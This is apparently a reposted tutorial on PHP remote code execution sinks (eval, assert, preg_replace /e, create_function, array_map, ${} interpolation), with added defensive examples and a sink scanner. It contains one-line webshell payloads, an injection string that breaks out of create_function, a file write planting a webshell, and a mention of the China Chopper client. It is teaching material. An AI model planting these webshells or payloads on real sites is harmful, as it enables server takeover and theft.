
Rce code execution & command execution (V)

2022-06-25 04:54:00 Key_ Words

Part 1: Basic principles of code execution and command execution

Code execution vulnerability (RCE: remote command or code execution)

Principle: data entered by the user is executed as back-end code.

Code execution: data entered by the user is executed as back-end code.

Command execution: data entered by the user is executed by the operating system.

In PHP there are many functions that execute code.

For example:

<?php eval($_REQUEST[8]); ?>   // eval executes the string as PHP code; multiple statements can be executed
<?php assert($_REQUEST[8]); ?> // assert evaluates the passed-in parameter as PHP code; only a single expression is allowed
How can multiple statements be executed through the assert function?

Answer: assert only executes a single expression, but eval can run multiple statements.

So we call the eval function from inside assert; the eval() call itself is a single expression!
For example, if the back-end code is: <?php assert($_REQUEST[8]); ?>

we can write in the URL bar: 127.0.0.1/1.php?8=eval('echo 123;phpinfo();')

(2) Write to a file: write all the code you need to execute into a file; the file can contain multiple lines.

file_put_contents('123.php', '<?php echo 123; phpinfo(); ?>');

file_put_contents function // writes a string to a file

This means the echo 123 and phpinfo() code is written into the file 123.php.

3. preg_replace function // regular-expression substitution

preg_replace('/a/', 'b', 'aabbwe') replaces a with b here; the output is bbbbwe.

Then someone will ask: what is the use of this?

There is nothing wrong with the function itself; what caused the problem is its modifier.

Regular expressions support many modifiers, and one of them is /e.

The heart of /e: the second parameter (the replacement string) is executed as code.

For example: preg_replace('/a/e', 'phpinfo()', 'aabbwe')

The second parameter here will be executed as code.

What if you can control the regular expression rules of the target website? Isn't that dangerous?

Note: if the subject string contains no match for a, nothing is executed (for example preg_replace('/a/e', 'phpinfo()', 'bbbbwe')).
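The /e modifier that makes this sink dangerous was deprecated in PHP 5.5 and removed in PHP 7.0. As an added example (not from the original post), the following contrasts the legacy call with the preg_replace_callback() form that replaces it, and adds a check for the case where the pattern itself is attacker-influenced; safe_pattern() is a name chosen here.

```php
<?php
// Added example (not from the original post): the /e modifier beside its safe replacement.
// /e was deprecated in PHP 5.5 and removed in PHP 7.0; on PHP 7 and later the legacy call
// below emits "Unknown modifier 'e'" and returns NULL instead of executing anything.
// Only the post's own subject string 'aabbwe' is used; no request data is evaluated.

// 1. Legacy form (PHP 5 only): the replacement string is evaluated as PHP code for each match,
//    so whoever controls that string controls the code.
$legacy = @preg_replace('/a/e', "strtoupper('b')", 'aabbwe');

// 2. Modern form: the callback is ordinary compiled code, never a string that gets eval'd.
//    Untrusted data can only ever be the subject (or the matched text), never the code.
$modern = preg_replace_callback('/a/', function (array $m): string {
    return strtoupper('b');
}, 'aabbwe');
var_dump($modern);   // every 'a' replaced by 'B'

// 3. If the pattern itself comes from a request (the "control the regular expression rules"
//    case above), reject anything that is not /.../ with a harmless modifier before it reaches
//    preg_replace on a PHP 5 host. safe_pattern() is a name chosen for this example.
function safe_pattern(string $pattern): ?string {
    // delimiter must be '/', body must not contain an unescaped '/', modifiers limited to imsux
    if (!preg_match('#^/(?:[^/\\\\]|\\\\.)+/[imsux]*$#', $pattern)) {
        return null;   // /e, a different delimiter, or a malformed pattern
    }
    return $pattern;
}
var_dump(safe_pattern('/a/i'));   // accepted
var_dump(safe_pattern('/a/e'));   // rejected
```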

4. create_function // anonymous functions, user-defined functions

create_function(first parameter: the formal parameter list, second parameter: the code to execute);

For readers whose coding background is weaker, this function can be hard to understand.

Let me give an example.

Put simply, an anonymous function is a function created by the user that has no name.
create_function() creates such an anonymous function.
You only need to understand that its parameters describe a function: the first parameter is the formal parameter list, which means that when you call the function you pass it arguments.
For example, here I create an anonymous function:
$a = create_function('$id', 'echo $id;');   $a now represents the anonymous function (think of it as the function name). Calling $a and passing it the argument 8, as $a(8), assigns 8 to the parameter $id, and then echo $id runs.

$a is equivalent to a function.
Call $a:
$a(8)
This passes the argument 8 to the function, so
$id = 8
and then echo $id; runs,
which outputs 8.
Now replace it with:

$a = create_function('$id', $_REQUEST[8]);

$a(10);

The principle is the same: if we can control the second parameter, we can get a shell.

At this point someone will ask: what if there is no $a(10) call, so the function is never invoked?

We can request 1.php?8=}phpinfo();//

The } closes the { that precedes it in the generated function body,

// comments out the } that follows,

and in the end phpinfo(); is executed.

A webshell client such as Caidao (China Chopper) can then connect.
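As an added example (not from the original post), here is the create_function() sink above beside the closure-based allow-list that replaces it; vulnerable_lambda(), dispatch() and the $actions map are names chosen here, and the payload fed to dispatch() is the post's own }phpinfo();//.

```php
<?php
// Added example (not from the original post): why create_function() is dangerous and
// what replaces it. create_function() builds the string "function __lambda_func($id){ ... }"
// and eval()s it, which is why the injected `}phpinfo();//` from the post runs at
// *definition* time even when $a is never called. It was deprecated in PHP 7.2 and
// removed in PHP 8.0, so the first function only does anything on PHP 7.

// Vulnerable shape from the post: $code stands in for $_REQUEST[8].
function vulnerable_lambda(string $code) {
    if (!function_exists('create_function')) {   // PHP 8: the sink no longer exists
        return null;
    }
    return create_function('$id', $code);        // $code is eval'd right here
}

// Safe shape: each body is compiled code written by the developer. Request data may
// select *which* closure runs, from a fixed allow-list, but never contributes to the code.
$actions = [
    'echo'   => function ($id): string { return (string) $id; },
    'square' => function ($id): string { return (string) ($id * $id); },
];

function dispatch(array $actions, string $name, $arg): string {
    if (!array_key_exists($name, $actions)) {
        throw new InvalidArgumentException("unknown action: $name");
    }
    return $actions[$name]($arg);
}

echo dispatch($actions, 'square', 10), "\n";
try {
    echo dispatch($actions, '}phpinfo();//', 10);  // the post's payload is just an unknown key
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```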

5. array_map // callback function: calls a function

For example:

function // defines a function: function cube($n)

return // the value returned after the function runs: return ($n*$n*$n);

Also, $a = [1,2,3,4,5]; each element is put into ($n*$n*$n) in turn:

1x1x1=1

2x2x2=8

3x3x3=27

You get the idea.

array_map's role is obvious here: it applies the function to each element of the array in turn.

Now change it to array_map($_REQUEST[1], $_REQUEST);

call_user_func() can also be used for callbacks; PHP has a great many callback functions.

There are many other such functions (you can look them up yourself).

6. Special combination (double-quoted string secondary parsing)

[Usable on PHP 5.5 and above]

This is also described in the official PHP documentation: https://www.php.net/manual/zh/language.types.string.php

"${phpinfo()}";  => code execution: phpinfo()

This means that when $ and { appear next to each other inside a double-quoted string, the content in the braces is executed as code.

${phpinfo()};

In addition, you can use file_put_contents(), the file-writing function everyone learned above.

"${file_put_contents('16.php','<?php eval($_REQUEST[8])?>')}";

This function writes a one-line webshell into 16.php, no problem.

Then visit 16.php?8=phpinfo(); (you get the idea).
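To find these sinks in a code base before an attacker does, here is an added example (not from the original post) of a small token-based scanner covering all six techniques above; find_sinks(), SINKS and SOURCES are names chosen here, and the sample source it scans is constructed.

```php
<?php
// Added example (not from the original post): a triage scanner for the sinks discussed above.
// It tokenises PHP source with token_get_all() and reports each call to a known code-execution
// sink whose argument list directly contains a request superglobal, plus every "${...}"
// interpolation inside a double-quoted string. It is not a taint analysis: input copied into
// a plain variable first is not followed, so treat the result as a first pass only.
const SINKS = ['eval', 'assert', 'create_function', 'array_map', 'call_user_func',
               'call_user_func_array', 'preg_replace', 'file_put_contents'];
const SOURCES = ['$_REQUEST', '$_GET', '$_POST', '$_COOKIE'];

function find_sinks(string $src): array {
    $tokens = token_get_all($src);
    $n = count($tokens);
    $hits = [];
    for ($i = 0; $i < $n; $i++) {
        if (!is_array($tokens[$i])) continue;
        [$id, $text, $line] = $tokens[$i];
        if ($id === T_DOLLAR_OPEN_CURLY_BRACES) {          // the "${" of "${expr}"
            $hits[] = "line $line: \${...} interpolation in double-quoted string";
            continue;
        }
        if (($id !== T_STRING && $id !== T_EVAL) || !in_array(strtolower($text), SINKS, true)) continue;
        $depth = 0; $args = '';                             // collect the balanced (...) after the name
        for ($j = $i + 1; $j < $n; $j++) {
            $tok = is_array($tokens[$j]) ? $tokens[$j][1] : $tokens[$j];
            if ($tok === '(') $depth++;
            elseif ($tok === ')' && --$depth === 0) break;
            $args .= $tok;
        }
        foreach (SOURCES as $s) {
            if (stripos($args, $s) !== false) { $hits[] = "line $line: $text() receives $s"; break; }
        }
    }
    return $hits;
}

// Constructed sample containing the post's patterns; the last line is the safe form and is not flagged.
$sample = <<<'PHP'
<?php
assert($_REQUEST[8]);
$a = create_function('$id', $_REQUEST[8]);
array_map($_REQUEST[1], $_REQUEST);
echo "${phpinfo()}";
$safe = preg_replace_callback('/a/', fn($m) => 'b', $_GET['s']);
PHP;
print_r(find_sinks($sample));
```

Running it reports the assert, create_function and array_map calls on lines 2 to 4 and the ${...} interpolation on line 5, while the preg_replace_callback line is left alone.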

Link to the original text: https://blog.csdn.net/weixin_50446974/article/details/117201357


Copyright notice
This article was written by [Key_ Words]; please include the original link when reposting. Thank you.
https://yzsam.com/2022/02/202202210532515584.html